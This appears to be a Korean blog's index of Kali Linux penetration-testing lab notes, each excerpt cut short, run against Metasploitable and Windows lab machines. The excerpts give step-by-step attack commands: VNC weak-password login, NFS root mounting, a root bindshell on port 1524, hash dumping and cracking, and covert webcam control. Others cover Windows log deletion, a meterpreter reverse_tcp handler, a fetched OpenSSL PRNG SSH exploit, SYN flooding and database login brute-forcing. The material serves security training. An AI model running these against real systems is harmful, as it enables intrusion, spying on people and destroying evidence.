목록Kali Linux (52)
Self-Improvement
*정의 상대 서버에는 VNC서버가 구동중이며 약한 암호로 설정이 되어있으며 암호는 “password“이다. 이를 통해서 로그인 및 서비스 제어를 할 수 있어 인증되지 않은 공격자에 의해 악용될 수 있습니다. Attacker : kali Victim : metasploitable *실습 (kali) root@kali:~# nmap -sV -p 5900 192.168.10.134 r oot@kali:~# vncviewer 192.168.10.134 패스워드 : password로 하였더니 성공하였다.
*정의 상대 서버의 NFS 공유 자원에 모든 호스트들이 접근 가능하며 마운트를 수행하여 파일을 읽고 쓰기를 할 수가 있는 취약점이다. Attacker : kali Victim : metasploitable *실습 (kali) root@kali:~# nmap -sV -p 2049 192.168.10.134 root@kali:~# showmount -e 192.168.10.134 모든 호스트가 접근이 가능하다. root@kali:~# mount 192.168.10.134:/ /nfsmount root@kali:~# df -h | grep 192.168.10.134 root@kali:~# ls /nfsmount/ 상대 서버가 공유 경로를 /(루트)로 하였음으로 하위 폴더, 파일에 접근 가능함으로 취약하다.
*정의 공격자는 원격포트를 통해 인증없이 연결하고 명령어을 직접 전송하여 사용 할 수 있다. Attacker : kali Victim : metasploitable *실습 (kali) root@kali:~# nmap -sV -p 1524 192.168.10.134 root@kali:~# telnet 192.168.10.134 1524 암호입력없이 root권한으로 연결이 되어진다.
*세션을 이용한 post/hashdump(패스워드 크랙) 실습 Attacker : kali Victim : metasploitable ※Victim에 여러 취약점 공격을 통하여 Session이 연결되어 있어야함 (kali) msf > sessions msf > use post/linux/gather/hashdump msf > show options msf > set session 1 msf > show options msf > exploit msf > exit -y #john /root/.msf4/loot/20180105141842_default_192.168.10.134_linux.hashes_958442.txt 툴을 이용하여 해당 파일의 암호를 크랙을 하면 된다.
*웹캠제어 노트북에 장착이 되어 있는 웹캠 디바이스를 칼리 리눅스에서 제어해 보자. 사용하는 명령어는 다음과 같다. webcam_list 설치돼 있는 웹캠의 정보를 가져온다. webcam_start 목록에서 도출된 웹캠을 선택해서 시작한다. webcam_get_frame 사진의 프레임 값을 정한다. 화질을 지정할 때 사용한다. webcam_stop 웹캠의 실행을 중지한다. webcat_audio_record 웹캠 마이크를 사용해 녹음을 지원한다. ex) 핸드폰, 감시카메라 등 Attacker : kali Victim : 한성노트북 ※ 앞서 진행했던 reverse_tcp가 선행되어야 함 *실습 (kali) #msfconsole -q msf > use exploit/multi/handler msf > set..
*윈도우 2008 로그 삭제 Attacker : Kali Victim : Windows 2008 R2 사전에 Widows 2008 R2에 침입이 가능하다는 전제가 필요하다. *실습 (kali) #cd /root/bin #vi reverse_resource2.rc use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.20.50 set ExitSession false exploit -j -z ※msfconsole의 -r옵션인 리소스로 사용하기위해 사전 생성 #msfconsole -r reverse_resource2.rc (해당 터미널은 있고 새로운 터미널로 진행) #msfvenom -p window..
*meterpreter를 이용한 Reverse_TCP 공격 bind_TCP : 타겟이 공인IP로 되어있는 경우에(서버) Attacker가 해당 타겟에 붙는 것 reverse_TCP : 타겟이 사설IP로 되어있는 경우에(PC) Attacker가 항상 구동중인 상태의 서버로 타겟이 Attacker에 붙는 것 Attacker : Kali Victim : Windows 7 ※메터프리터는 상대 OS별로 사용할 수 있는 명령어를 제공 한다. *msfvenom msfvenom은 Metasploit의 페이로드를 파일 형식으로 만들어줌 *실습 (kali) #mkdir -p /root/bin #cd /root/bin #vi reverse_resource.rc (msfconsole의 리소스 형식으로 할 예정) use exp..
*Debian OpenSSL Predictable PRNG Brute Force SSH Attacker : Kali Victim : Metasploitable cve-2008-0166 Dabian 기반의 OS에 OpenSSL 0.9.8c-1 ~ 0.9.8g-9 버전까지 가능하며 예측가능한 숫자들을 가지고 Brute Force 하는 것 *실습 (kali) #mkdir -p /root/bin && cd /root/bin #wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 #tar jxvf 5622.tar.bz2 (Public와 상응하는 Private을 만들어냄) ex..
*TCP Syn Flooding 연결시 3Way-Handshake 방식에서 마지막 Ack을 보내지 않고 Syn만 보내는 것 ※Syn을 보내면 Ack,Syn을 받게됨으로 공격자도 부하량 걸리게 됨으로 Source IP를 바꿔서 보낸다. *실습 시나리오 : kali가 WebServer인 linux에 TCP Syn Flooding 공격을 함 (linux) ※사전에 WebServer로 작동되어야함 #mkdir /var/www/html/test #vi /var/www/html/test/index.html #firefox localhost/test & (win2008) 웹페이지 192.168.20.200/test 접속해서 작동되는지 확인하기 (kali) #wireshark & ※postgresql을 사용해야함으로 ..
*DB종류 msf 모듈 위치 MySQL : auxiliary/scanner/mysql/mysql_login MSSQL : auxiliary/scanner/mssql/mssql_login Oracle : auxiliary/scanner/oracle/oracle_login PostgreSQL : auxiliary/scanner/postgres/postgres_login *MySQL DB 실습 (kali) #nmap -sV 192.168.10.134 #msfconsole msf > search mysql_logind msf > use auxiliary/scanner/mysql/mysql_login msf auxiliary(mysql_login) > show options msf auxiliary(mysql_l..